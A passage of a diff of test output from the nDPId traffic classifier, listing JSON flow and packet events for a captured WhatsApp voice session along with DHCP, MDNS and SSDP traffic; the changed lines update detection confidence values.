{"version":"TLSv1.2","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455707474,"flow_last_seen":1561455707564,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455707564,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.3","client_requested_server_name":"pps.whatsapp.net","ja3":"7a7a639628f0fe5c7e057628a5bbec5a","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1561455709888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1561455709888,"pkt":"AQBeAAD7kLkxKPrKCABFAABNP9UAAP8R2BrAqAIM4AAA+xTpFOkAOUTGAAAAAAACAAAAAAAABV9yYW9wBF90Y3AFbG9jYWwAAAwAAQhfYWlycGxhecASAAwAAQ=="} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1561455709890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":111,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":111,"pkt_l4_len":57,"thread_ts_msec":1561455709890,"pkt":"MzMAAAD7kLkxKPrKht1gDagnADkR\/\/6AAAAAAAAABBRAnYr9nwX\/AgAAAAAAAAAAAAAAAAD7FOkU6QA5e0MAAAAAAAIAAAAAAAAFX3Jhb3AEX3RjcAVsb2NhbAAADAABCF9haXJwbGF5wBIADAAB"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1561455709984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1561455709984,"pkt":"AQBef\/\/6kLkxKPrKCABFAACggMsAAAIRhNPAqAIM7\/\/\/+vzMB2wAjOY9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1561455713015,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1561455713015,"pkt":"AQBef\/\/6kLkxKPrKCABFAAChffAAAAIRh63AqAIM7\/\/\/+vzMB2wAjYZETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTlBQUENvbm5lY3Rpb246MQ0KTUFOOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1561455721320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455721320,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqQAAP8RHAEAAAAA\/\/\/\/\/wBEAEMBNNuDAQEGAH5K8tcAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00735{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455721320,"flow_last_seen":1561455721320,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455721320,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1561455722541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455722541,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqUAAP8RHAAAAAAA\/\/\/\/\/wBEAEMBNNuCAQEGAH5K8tcAAQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1561455724934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455724934,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqYAAP8RG\/8AAAAA\/\/\/\/\/wBEAEMBNNuAAQEGAH5K8tcAAwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1561455726442,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455726442,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIUlcAAEARof3AqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1561455730495,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455730495,"pkt":"kLkxKPrKxiwDYGpkCABFAABI7nAAADERRFFb\/DgzwKgCDH\/A3AgANOnLAAEAGCESpEJZi1FU1SmRVkxGZgQACAAUYCmYSN+rkyNYVIx9I16CdotJWKc="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455730495,"flow_last_seen":1561455730495,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455730495,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1561455731073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455731073,"pkt":"kLkxKPrKxiwDYGpkCABFAABIAlEAADERMHFb\/DgzwKgCDH\/A3AgANGApAAEAGCESpELobM0y9AHrYlN0+hgACAAU\/c20Lcr5wjE5JYKvJct9qbua6og="} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1561455731356,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455731356,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxjdoAAEARZVHAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1561455731665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455731665,"pkt":"xiwDYGpkkLkxKPrKCABFAABId7IAAEAR8MLAqAIMATxOQNwI+xoANL93AAEAGCESpEJNNg9OA5IbZKhKGmoACAAUkUJIDnID0ka3i4LpQfhGRUa3K\/w="} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455731665,"flow_last_seen":1561455731665,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455731665,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":56328,"dst_port":64282,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1561455731697,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455731697,"pkt":"kLkxKPrKxiwDYGpkCABFAABI\/gUAADERNLxb\/DgzwKgCDH\/A3AgANISZAAEAGCESpEKSaahiiU3KFyQDpDgACAAUPvQQqrwwB3kMX1876e4ssz8N17Y="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1561455732298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455732298,"pkt":"xiwDYGpkkLkxKPrKCABFAABIre0AAEARuofAqAIMATxOQNwI+xoANHLOAAEAGCESpEIrgAUzrwTeBSrSSH8ACAAUv8Ev3sei+dcRfEZy9ei0mRui3Zw="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1561455732919,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455732919,"pkt":"xiwDYGpkkLkxKPrKCABFAABIV+kAAEAREIzAqAIMATxOQNwI+xoANBvDAAEAGCESpELCs7YUVt8QVzF73yEACAAUMmINwHB46SKyj3xrODHnuD6GHSA="} -00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} -00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00690{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737893,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737893,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} +00699{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":633,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455737895,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455738163,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1561455741430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455741430,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClZnoAAAIRnx\/AqAIM7\/\/\/+sQPB2wAke7DTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 